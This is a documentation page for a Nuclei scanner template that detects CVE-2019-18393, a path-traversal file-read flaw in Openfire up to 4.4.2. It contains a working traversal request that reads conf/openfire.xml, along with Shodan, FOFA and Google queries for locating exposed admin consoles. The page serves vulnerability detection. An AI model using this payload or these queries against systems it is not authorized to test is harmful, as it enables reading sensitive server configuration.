Skip to content
Nuclei Templates

Ignite Realtime Openfire <4.42 - Local File Inclusion

ID: CVE-2019-18393

Severity: medium

Author: pikpikcu

Tags: cve,cve2019,openfire,lfi,igniterealtime

Description

Section titled “Description”

Ignite Realtime Openfire through 4.4.2 is vulnerable to local file inclusion via PluginServlet.java. It does not ensure that retrieved files are located under the Openfire home directory.

YAML Source

Section titled “YAML Source”
id: CVE-2019-18393


info:
  name: Ignite Realtime Openfire <4.42 - Local File Inclusion
  author: pikpikcu
  severity: medium
  description: Ignite Realtime Openfire through 4.4.2 is vulnerable to local file inclusion via PluginServlet.java. It does not ensure that retrieved files are located under the Openfire home directory.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system.
  remediation: |
    Upgrade Ignite Realtime Openfire to version 4.42 or later to mitigate this vulnerability.
  reference:
    - https://github.com/igniterealtime/Openfire/pull/1498
    - https://swarm.ptsecurity.com/openfire-admin-console/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-18393
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Elsfa7-110/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2019-18393
    cwe-id: CWE-22
    epss-score: 0.00161
    epss-percentile: 0.52637
    cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: igniterealtime
    product: openfire
    shodan-query:
      - http.title:"openfire admin console"
      - http.title:"openfire"
    fofa-query:
      - title="openfire"
      - title="openfire admin console"
    google-query:
      - intitle:"openfire"
      - intitle:"openfire admin console"
  tags: cve,cve2019,openfire,lfi,igniterealtime


http:
  - method: GET
    path:
      - '{{BaseURL}}/plugins/search/..\..\..\conf\openfire.xml'


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "org.jivesoftware.database.EmbeddedConnectionProvider"
          - "Most properties are stored in the Openfire database"


      - type: status
        status:
          - 200
# digest: 490a0046304402206cf7081df31cc4eb90d0bd2e0b42ba227b000da9b2c9b7da38c80641f369569e0220364cbfc052b90f74117bcb028aadee2a1c855998017467eb972f9c06181fe620:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-18393.yaml"

View on Github